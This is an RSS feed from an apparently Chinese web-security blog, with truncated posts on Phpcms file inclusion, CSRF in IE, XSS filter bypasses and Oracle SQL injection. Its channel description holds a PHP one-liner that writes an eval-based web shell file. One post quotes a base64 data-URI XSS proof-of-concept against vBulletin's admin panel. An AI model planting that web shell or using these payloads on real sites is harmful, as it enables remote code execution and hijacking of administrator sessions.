<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0">
 <channel>
  <title>5up3rh3i'blog［提供有偿web代码安全审计服务］</title>
  <link>http://superhei.blogbus.com</link>
  <description><![CDATA[MSN:SuperHei@ph4nt0m.org< ?fputs(fopen('heige.php','w+'),'< ?php @eval($_POST[c])? >');? > ]]></description>
  <generator> by blogbus.com </generator>
  <lastBuildDate>Thu, 01 Jan 1970 07:00:00 +0700</lastBuildDate>
  <image>
									<url>http://public.blogbus.com/profile/8/5/8/1117858/avatar_1117858_96.jpg</url>
									<title>5up3rh3i'blog［提供有偿web代码安全审计服务］</title>
									<link>http://superhei.blogbus.com</link>
								</image>  <item>
   <title>在百度的blog</title>
   <description><![CDATA[在百度的blog<br /><br />
http://hi.baidu.com/hi_heige<br /><br /><!--sp--><div class="relpost"><br/><h3>随机文章：</h3><div><a href="/logs/8385157.html">现在的人真牛~~</a> 2007-09-22</div><div><a href="/logs/7889121.html">GRASP</a> 2007-08-23</div><div><a href="/logs/5502029.html">做人也要有那么点原则</a> 2007-05-24</div><div><a href="/logs/3431673.html">Security Tips[msdn]</a> 2006-09-28</div><div><a href="/logs/2581424.html">Springboard</a> 2006-06-01</div></div><div class="addfav"><br />收藏到：<span class= "delicious"><a href="http://delicious.com/save?url=http%3A%2F%2Fsuperhei.blogbus.com%2Flogs%2F37074507.html&title=%E5%9C%A8%E7%99%BE%E5%BA%A6%E7%9A%84blog">Del.icio.us</a></span></div><br /><br /><div class="sysmsg"><b><a href="http://www.blogbus.com" target="_blank">博客大巴，你的个人传媒早班车</a></b></div><br /><br />]]></description>
   <link>http://superhei.blogbus.com/logs/37074507.html</link>
   <author>superhei</author>
   <pubDate>Thu, 26 Mar 2009 21:23:14 +0800</pubDate>
  </item>
  <item>
   <title>[zz]Phpcms 2007 远程文件包含漏洞</title>
   <description><![CDATA[[zz]Phpcms 2007 远程文件包含漏洞<br /><br />url:http://www.wolvez.org/forum/redirect.php?tid=182&amp;goto=lastpost<br /><br />这个漏洞是一个比较普通的变量覆盖漏洞，这里转一下是由于发现这个漏洞如果是白盒那要都仔细看代码才行 ：）<br /><br />引用 ：<br /><br />------------------------------------------------<br />/...<!--sp--><div class="relpost"><br/><h3>随机文章：</h3><div><a href="/logs/19485123.html">pwns your box</a> 2008-04-21</div><div><a href="/logs/10645302.html">Google-Xss</a> 2007-11-05</div><div><a href="/logs/4625097.html">Know your Enemy:Web Application Threats</a> 2007-02-27</div><div><a href="/logs/3209055.html">web代码安全边缘性问题</a> 2006-09-01</div><div><a href="/logs/1806166.html">让“肥马”变成“火锅”</a> 2006-01-09</div></div><div class="addfav"><br />收藏到：<span class= "delicious"><a href="http://delicious.com/save?url=http%3A%2F%2Fsuperhei.blogbus.com%2Flogs%2F24755478.html&title=%5Bzz%5DPhpcms+2007+%E8%BF%9C%E7%A8%8B%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E">Del.icio.us</a></span></div><br /><br /><div class="sysmsg"><b><a href="http://www.blogbus.com" target="_blank">博客大巴，你的个人传媒早班车</a></b></div><br /><br />]]></description>
   <link>http://superhei.blogbus.com/logs/24755478.html</link>
   <author>superhei</author>
   <pubDate>Mon, 14 Jul 2008 23:49:04 +0800</pubDate>
  </item>
  <item>
   <title>blog又又又被黑</title>
   <description><![CDATA[<br /><br />该牛人不愿意透露细节:(<br /><br />主要原因估计是我得罪的人太多了..... .所以友情提醒下看我blog的朋友啊,请使用ff+noscript 防止被人挂马等估计 :) .看来我自己也要注意下安全了 老是被黑 朋友都不信任我了 呵呵<br /><br />另外fuck一下blogbus 后台连个修改密码的地方都没有<br /><br /><!--sp--><div class="relpost"><br/><h3>随机文章：</h3><div><a href="/logs/21306189.html">[zz]Microsoft word javascript execution</a> 2008-05-21</div><div><a href="/logs/13599945.html">SIX攻击一例</a> 2008-01-09</div><div><a href="/logs/11182869.html">Bypass htmlentities</a> 2007-11-27</div><div><a href="/logs/7026754.html">牛人到处都是.........</a> 2007-07-24</div><div><a href="/logs/5502029.html">做人也要有那么点原则</a> 2007-05-24</div></div><div class="addfav"><br />收藏到：<span class= "delicious"><a href="http://delicious.com/save?url=http%3A%2F%2Fsuperhei.blogbus.com%2Flogs%2F24533292.html&title=blog%E5%8F%88%E5%8F%88%E5%8F%88%E8%A2%AB%E9%BB%91">Del.icio.us</a></span></div><br /><br /><div class="sysmsg"><b><a href="http://www.blogbus.com" target="_blank">博客大巴，你的个人传媒早班车</a></b></div><br /><br />]]></description>
   <link>http://superhei.blogbus.com/logs/24533292.html</link>
   <author>superhei</author>
   <pubDate>Fri, 11 Jul 2008 14:53:03 +0800</pubDate>
  </item>
  <item>
   <title>[zz]Microsoft Blogs and Web Resources about Security</title>
   <description><![CDATA[http://blogs.technet.com/feliciano_intini/pages/microsoft-blogs-and-web-resources-about-security.aspx<!--sp--><div class="relpost"><br/><h3>随机文章：</h3><div><a href="/logs/21533832.html">A New Class of Vulnerability in Oracle: Lateral SQL Injection</a> 2008-05-24</div><div><a href="/logs/10006850.html">pw6取消了全局变量</a> 2007-09-24</div><div><a href="/logs/4971079.html">The current state of PHP security (w/ MOPB full review)</a> 2007-04-07</div><div><a href="/logs/2260472.html">Include Jsp File</a> 2006-04-14</div><div><a href="/logs/1916091.html">意识漏洞??</a> 2006-02-12</div></div><div class="addfav"><br />收藏到：<span class= "delicious"><a href="http://delicious.com/save?url=http%3A%2F%2Fsuperhei.blogbus.com%2Flogs%2F24056691.html&title=%5Bzz%5DMicrosoft+Blogs+and+Web+Resources+about+Security">Del.icio.us</a></span></div><br /><br /><div class="sysmsg"><b><a href="http://www.blogbus.com" target="_blank">博客大巴，你的个人传媒早班车</a></b></div><br /><br />]]></description>
   <link>http://superhei.blogbus.com/logs/24056691.html</link>
   <author>superhei</author>
   <pubDate>Thu, 03 Jul 2008 20:05:28 +0800</pubDate>
  </item>
  <item>
   <title>学习WebZine [0x02]后乱谈</title>
   <description><![CDATA[学习WebZine [0x02]后乱谈<br /><br />文/superhei<br /><br />这里学习了下自己看的明白的PP<br /><br />[<a href="http://www.ph4nt0m.org/" target="_blank">PST</a>Zine 0x02][0x07][乱谈之XSS攻击检测]<br /><br />这个文章里提到了几个有趣的漏洞：<br /><br />1.phpinfo() 4096字节后的xss,这个漏洞要是不去分析php的源代码是没有办法发现的，很多人看应用程序的原代码只去分析溢出等问题，但是忽视了应用上的安全，这个还是要看发现者的意识，SE大...<!--sp--><div class="relpost"><br/><h3>随机文章：</h3><div><a href="/logs/37074507.html">在百度的blog</a> 2009-03-26</div><div><a href="/logs/4980188.html">老外给7jj的e文名字</a> 2007-04-08</div><div><a href="/logs/4671216.html">the Month of PHP Bugs</a> 2007-03-03</div><div><a href="/logs/2663920.html">现在流行preg......　??</a> 2006-06-15</div><div><a href="/logs/2023473.html">Grep与web漏洞挖掘</a> 2006-03-08</div></div><div class="addfav"><br />收藏到：<span class= "delicious"><a href="http://delicious.com/save?url=http%3A%2F%2Fsuperhei.blogbus.com%2Flogs%2F23531061.html&title=%E5%AD%A6%E4%B9%A0WebZine+%5B0x02%5D%E5%90%8E%E4%B9%B1%E8%B0%88">Del.icio.us</a></span></div><br /><br /><div class="sysmsg"><b><a href="http://www.blogbus.com" target="_blank">博客大巴，你的个人传媒早班车</a></b></div><br /><br />]]></description>
   <link>http://superhei.blogbus.com/logs/23531061.html</link>
   <author>superhei</author>
   <pubDate>Wed, 25 Jun 2008 00:24:20 +0800</pubDate>
  </item>
  <item>
   <title>犯了个很严重的错误 :(</title>
   <description><![CDATA[qz的blog上：http://xss.betaslife.com/blog/?p=24<br /><br />&nbsp; 在IE下，从站外来进行的大部分的CSRF攻击是无效的（直接访问的表单构造的POST请求除外），包括IMG,IFRAME等伪造请求。因为IE的安全
特性，无论是使用当前浏览器进程得到的cookie还是浏览器本地保存的cookie，隐私保护会拦截第三方站点的COOKIE。<br /><br />今天测试了一下ie6/7确实都是这样的 图：<br /><br />&nbsp;我一...<!--sp--><div class="relpost"><br/><h3>随机文章：</h3><div><a href="/logs/21306189.html">[zz]Microsoft word javascript execution</a> 2008-05-21</div><div><a href="/logs/10161450.html">郁闷的blogbus</a> 2007-10-04</div><div><a href="/logs/5193416.html">OWASP_Papers/Jeopardy_in_Web_2_0</a> 2007-04-28</div><div><a href="/logs/5056322.html">关于defined()</a> 2007-04-16</div><div><a href="/logs/3720647.html">ScanWebShell?</a> 2006-10-29</div></div><div class="addfav"><br />收藏到：<span class= "delicious"><a href="http://delicious.com/save?url=http%3A%2F%2Fsuperhei.blogbus.com%2Flogs%2F23466639.html&title=%E7%8A%AF%E4%BA%86%E4%B8%AA%E5%BE%88%E4%B8%A5%E9%87%8D%E7%9A%84%E9%94%99%E8%AF%AF+%3A%28">Del.icio.us</a></span></div><br /><br /><div class="sysmsg"><b><a href="http://www.blogbus.com" target="_blank">博客大巴，你的个人传媒早班车</a></b></div><br /><br />]]></description>
   <link>http://superhei.blogbus.com/logs/23466639.html</link>
   <author>superhei</author>
   <pubDate>Mon, 23 Jun 2008 22:41:18 +0800</pubDate>
  </item>
  <item>
   <title>Data:_URI_scheme</title>
   <description><![CDATA[Data:_URI_scheme<br /><br />前几天FD上公布了一个vbb的xss: http://seclists.org/fulldisclosure/2008/Jun/0181.html,这个bug比较有意思：<br /><br />admincp/index.php?redirect=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K<br /><br />代码：admincp/index.php 98-10...<!--sp--><div class="relpost"><br/><h3>随机文章：</h3><div><a href="/logs/15909339.html">[tool]小颖Java源代码反编译超级引挚</a> 2008-02-24</div><div><a href="/logs/8080280.html">Sql-injection In Xss[SIX]</a> 2007-09-03</div><div><a href="/logs/2798316.html">近期可能无法上网</a> 2006-07-09</div><div><a href="/logs/2081597.html">[zz]Weaknesses in Web-Applications v1.3</a> 2006-03-17</div><div><a href="/logs/1973555.html">我是否可以从事安全工作？</a> 2006-02-25</div></div><div class="addfav"><br />收藏到：<span class= "delicious"><a href="http://delicious.com/save?url=http%3A%2F%2Fsuperhei.blogbus.com%2Flogs%2F23355141.html&title=Data%3A_URI_scheme">Del.icio.us</a></span></div><br /><br /><div class="sysmsg"><b><a href="http://www.blogbus.com" target="_blank">博客大巴，你的个人传媒早班车</a></b></div><br /><br />]]></description>
   <link>http://superhei.blogbus.com/logs/23355141.html</link>
   <author>superhei</author>
   <pubDate>Sat, 21 Jun 2008 23:39:48 +0800</pubDate>
  </item>
  <item>
   <title>WebZine [0x02]</title>
   <description><![CDATA[2008.6.18 - WebZine [0x02]<!--sp--><div class="relpost"><br/><h3>随机文章：</h3><div><a href="/logs/24533292.html">blog又又又被黑</a> 2008-07-11</div><div><a href="/logs/8260310.html">PHP 的开始/结束标记</a> 2007-09-13</div><div><a href="/logs/8080280.html">Sql-injection In Xss[SIX]</a> 2007-09-03</div><div><a href="/logs/2259673.html">php往届bugs</a> 2006-04-13</div><div><a href="/logs/1879855.html">casi4</a> 2006-02-02</div></div><div class="addfav"><br />收藏到：<span class= "delicious"><a href="http://delicious.com/save?url=http%3A%2F%2Fsuperhei.blogbus.com%2Flogs%2F23220981.html&title=WebZine+%5B0x02%5D">Del.icio.us</a></span></div><br /><br /><div class="sysmsg"><b><a href="http://www.blogbus.com" target="_blank">博客大巴，你的个人传媒早班车</a></b></div><br /><br />]]></description>
   <link>http://superhei.blogbus.com/logs/23220981.html</link>
   <author>superhei</author>
   <pubDate>Thu, 19 Jun 2008 15:10:27 +0800</pubDate>
  </item>
  <item>
   <title>Bypassing script filters with variable-width encodings</title>
   <description><![CDATA[url:http://applesoup.googlepages.com/bypass_filter.txt <br /><br />作者测试的时候还是ie6今天测试了一把ie7：<br /><br />http://60.190.243.111/superhei/xss/charset.bmp<br /><br />我这里没有ie8的，有的同学帮忙测试下,测试代码为原文里的 example.php<br /><br />结果模块： http://60.190.243.111/superhei/xs...<!--sp--><div class="relpost"><br/><h3>随机文章：</h3><div><a href="/logs/13463505.html">Bypass Preventing CSRF</a> 2008-01-07</div><div><a href="/logs/11412189.html">Request变量与csrf</a> 2007-12-02</div><div><a href="/logs/10582982.html">create_function</a> 2007-11-01</div><div><a href="/logs/5090915.html">关于幻影无法访问的问题</a> 2007-04-20</div><div><a href="/logs/3984544.html">还是郁闷！！</a> 2006-12-06</div></div><div class="addfav"><br />收藏到：<span class= "delicious"><a href="http://delicious.com/save?url=http%3A%2F%2Fsuperhei.blogbus.com%2Flogs%2F22568721.html&title=Bypassing+script+filters+with+variable-width+encodings">Del.icio.us</a></span></div><br /><br /><div class="sysmsg"><b><a href="http://www.blogbus.com" target="_blank">博客大巴，你的个人传媒早班车</a></b></div><br /><br />]]></description>
   <link>http://superhei.blogbus.com/logs/22568721.html</link>
   <author>superhei</author>
   <pubDate>Mon, 09 Jun 2008 12:03:58 +0800</pubDate>
  </item>
  <item>
   <title>A New Class of Vulnerability in Oracle: Lateral SQL Injection</title>
   <description><![CDATA[avid Litchfield 在他的blog上写了一些关于他pp《A New Class of Vulnerability in Oracle: Lateral SQL Injection》的一些说明：<br /><br />http://www.davidlitchfield.com/blog/archives/00000042.htm<br /><br />里面有个8挂就是：<br /><br />5) This paper is mostly academic<br />No, it's n...<!--sp--><div class="relpost"><br/><h3>随机文章：</h3><div><a href="/logs/19826679.html">rgod 挂了~~~ :(</a> 2008-04-26</div><div><a href="/logs/10565484.html">[zz]TikiWiki Remote PHP Code Evaluation Vulnerability</a> 2007-10-30</div><div><a href="/logs/8070889.html">Dz0724补丁补掉的一个xss</a> 2007-09-03</div><div><a href="/logs/5770715.html">SQL Server 2005 文档</a> 2007-06-10</div><div><a href="/logs/2084672.html">FiltersScan2.pl</a> 2006-03-17</div></div><div class="addfav"><br />收藏到：<span class= "delicious"><a href="http://delicious.com/save?url=http%3A%2F%2Fsuperhei.blogbus.com%2Flogs%2F21533832.html&title=A+New+Class+of+Vulnerability+in+Oracle%3A+Lateral+SQL+Injection">Del.icio.us</a></span></div><br /><br /><div class="sysmsg"><b><a href="http://www.blogbus.com" target="_blank">博客大巴，你的个人传媒早班车</a></b></div><br /><br />]]></description>
   <link>http://superhei.blogbus.com/logs/21533832.html</link>
   <author>superhei</author>
   <pubDate>Sat, 24 May 2008 16:34:54 +0800</pubDate>
  </item>
 </channel>
</rss>
